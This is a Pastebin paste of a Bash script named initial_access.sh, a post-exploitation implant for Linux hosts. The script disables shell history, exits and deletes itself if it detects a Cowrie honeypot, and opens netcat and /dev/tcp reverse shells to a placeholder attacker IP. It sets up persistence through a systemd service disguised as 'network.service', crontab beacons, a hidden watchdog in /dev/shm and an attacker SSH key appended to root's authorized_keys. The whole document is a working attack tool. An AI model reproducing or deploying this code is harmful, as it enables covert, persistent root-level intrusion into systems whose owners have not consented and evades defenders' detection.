Advertisement
FlyFar

initial_access.sh

Jul 10th, 2023
822
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 5.49 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2. #created by ice-wzl
  3. #usage: ./shm.sh 2>/dev/null --> will launch clean on target device
  4. #2021-10-23
  5. #tested on Ubuntu 20.04/CentOS 8
  6.  
  7. ##########################################################################
  8.  
  9. #begin checks if conditions are not met, delete
  10. #remote history logging for script
  11. unset HISTFILE HISTFILESIZE HISTSIZE PROMPT_COMMAND
  12. #ensure running as root if not, delete
  13. perms=$(id | grep uid | cut -d ' ' -f1 | cut -d '=' -f2 | cut -d '(' -f1)
  14. if [ $perms -ne 0 ]; then
  15.     rm shm.sh
  16.     exit 1
  17. else
  18.     continue
  19. fi
  20. #ensure that this is a linux system
  21. if [ "$(cat /proc/version | grep Linux)" ]; then
  22.     continue
  23. else
  24.     rm shm.sh
  25.     exit 2
  26. fi
  27. #ensure that it is a systemd system
  28. if [ "$(ps -elf | grep -E '/sbin/init | /lib/systemd/system | /usr/lib/systemd/systemd' | grep -v grep)" ]; then
  29.     continue
  30. else
  31.     rm shm.sh
  32.     exit 3
  33. fi
  34.  
  35. #start cowrie honeypot checks
  36. #srv04 is the default hostname for cowrie
  37. view=$(which cat)
  38.  
  39. if [ "$($view /etc/hostname | grep srv04)" ]; then
  40.     echo "Yes"
  41.     rm shm.sh
  42.     exit 4
  43. else
  44.     continue
  45. fi
  46.  
  47. #phil is the default home directory on cowrie and cowrie will run on Debian 4.* by default
  48. #want to combine these to in order to make sure we are not deleting off every machine with phil as a user
  49. look=$(which ls)
  50.  
  51. if [ "$($look /home | grep 'phil' && $view /proc/version | grep "Debian 4.")" ]; then
  52.     rm shm.sh
  53.     exit 5
  54. else
  55.     continue
  56. fi
  57.  
  58. #file is not included on cowrie so check for that
  59.  
  60. if [ "$(which file)" ]; then
  61.     continue
  62. else
  63.     rm shm.sh
  64.     exit 6
  65. fi
  66.  
  67.  
  68. #internet test
  69. interweb=$(ping -c 4 8.8.8.8 | grep "64 bytes" | cut -d " " -f1,2)
  70. if [ "$interweb" ]; then
  71.     echo "Yes internet" #would want to put a call out here
  72. else
  73.     echo "No internet" #need to think of something to go here as well
  74. fi
  75.  
  76. #test for "fake internet access"
  77. fake=$(ping -c 4 999.999.999.999 | grep "64 bytes" | cut -d " " -f1,2)
  78. if [ "$fake" ];then
  79.     rm shm.sh
  80.     exit 7
  81. else
  82.     continue
  83. fi
  84.  
  85. #good to proceed checks over
  86. #check if nc is on the target if yes beacon if no skip
  87. if [ "$(which nc)" ]; then
  88.     continue
  89.     touch /tmp/.f
  90.     rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/bash -i 2>&1|nc IP_ADDRESS 80 >/tmp/.f &
  91.    
  92. else
  93.     continue
  94. fi
  95.  
  96. #persistance via service
  97. #get shell var
  98. shell=$(which bash)
  99. touch /etc/systemd/system/network.service
  100. chmod +x /etc/systemd/system/network.service
  101. echo '[Unit]' > /etc/systemd/system/network.service
  102. echo 'Description=Network Service' >> /etc/systemd/system/network.service
  103. echo 'Documentation=man:nc(1)' >> /etc/systemd/system/network.service
  104. echo 'After=network.target' >> /etc/systemd/system/network.service
  105.  
  106. echo '[Service]' >> /etc/systemd/system/network.service
  107. echo 'Type=Simple' >> /etc/systemd/system/network.service
  108. echo 'User=root' >> /etc/systemd/system/network.service
  109. echo "ExecStart=$shell -c 'bash -i >& /dev/tcp/IP_ADDRESS/1111 0>&1'" >> /etc/systemd/system/network.service
  110. echo 'Restart=Always' >> /etc/systemd/system/network.service
  111.  
  112. echo '[Install]' >> /etc/systemd/system/network.service
  113. echo 'WantedBy=multi-user.target' >> /etc/systemd/system/network.service
  114. #enable on boot and reload daemon + start the new service beacon
  115. systemctl daemon-reload
  116. sleep 1
  117. systemctl enable network.service
  118. systemctl start network.service
  119. sleep 1
  120.  
  121.  
  122. #crontab persistance to ensure checker script is running in the background + beacon persistance
  123. echo "*/10 * * * * root /bin/sh /dev/shm/.proc/proc &" >> /etc/crontab
  124. echo "*/30 * * * * root /bin/sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRESS 443 >/tmp/f" >> /etc/crontab
  125.  
  126. #make backup service file
  127. mkdir /dev/shm/.fstab
  128. touch /dev/shm/.fstab/fstab
  129. chmod +x /dev/shm/.fstab/fstab
  130.  
  131. #backup service unit file
  132. echo '[Unit]' > /dev/shm/.fstab/fstab
  133. echo 'Description=Network Service' >> /dev/shm/.fstab/fstab
  134. echo 'Documentation=man:nc(1)' >> /dev/shm/.fstab/fstab
  135. echo 'After=network.target' >> /dev/shm/.fstab/fstab
  136.  
  137. echo '[Service]' >> /dev/shm/.fstab/fstab
  138. echo 'User=root' >> /dev/shm/.fstab/fstab
  139. echo 'Type=Simple' >> /dev/shm/.fstab/fstab
  140. echo "ExecStart=$shell -c 'bash -i >& /dev/tcp/IP_ADDRESS/1111 0>&1'" >> /dev/shm/.fstab/fstab
  141. echo 'Restart=Always' >> /dev/shm/.fstab/fstab
  142.  
  143. echo '[Install]' >> /dev/shm/.fstab/fstab
  144. echo 'WantedBy=multi-user.target' >> /dev/shm/.fstab/fstab
  145.  
  146.  
  147. #create checker script to cp backup service unit file to systemd/system if it is deleted will run + crontab 10 minutes
  148. mkdir /dev/shm/.proc
  149. touch /dev/shm/.proc/proc
  150. chmod +x /dev/shm/.proc/proc
  151. echo '#!/bin/bash' >> /dev/shm/.proc/proc
  152. echo 'if [[ -e /etc/systemd/system/network.service ]]; then' >> /dev/shm/.proc/proc
  153. echo '    exit 0' >> /dev/shm/.proc/proc
  154. echo 'else' >> /dev/shm/.proc/proc
  155. echo '    cp /dev/shm/.fstab/fstab /etc/systemd/system/network.service' >> /dev/shm/.proc/proc
  156. echo '    chmod +x /etc/systemd/system/network.service' >> /dev/shm/.proc/proc
  157. echo '    systemctl daemon-reload' >> /dev/shm/.proc/proc
  158. echo '    systemctl enable network.service' >> /dev/shm/.proc/proc
  159. echo '    systemctl start network.service' >> /dev/shm/.proc/proc
  160. echo 'fi' >> /dev/shm/.proc/proc
  161. sleep 1
  162. cd /dev/shm/.proc
  163. ./proc &
  164.  
  165. #ssh key persistance will be able to pull ip from beacons + key will give alternative way onto the box outside of catching shells
  166. if [[ -d /root/.ssh ]]; then
  167.     continue
  168. else
  169.     mkdir /root/.ssh
  170. fi
  171. if [[ -f /root/.ssh/authorized_keys ]]; then
  172.     echo 'PUBLIC_SSH_KEY_HERE' >> /root/.ssh/authorized_keys
  173. else
  174.     touch /root/.ssh/authorized_keys
  175.     echo 'PUBLIC_SSH_KEY_HERE' > /root/.ssh/authorized_keys
  176. fi
  177.  
  178. rm shm.sh
  179. exit 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement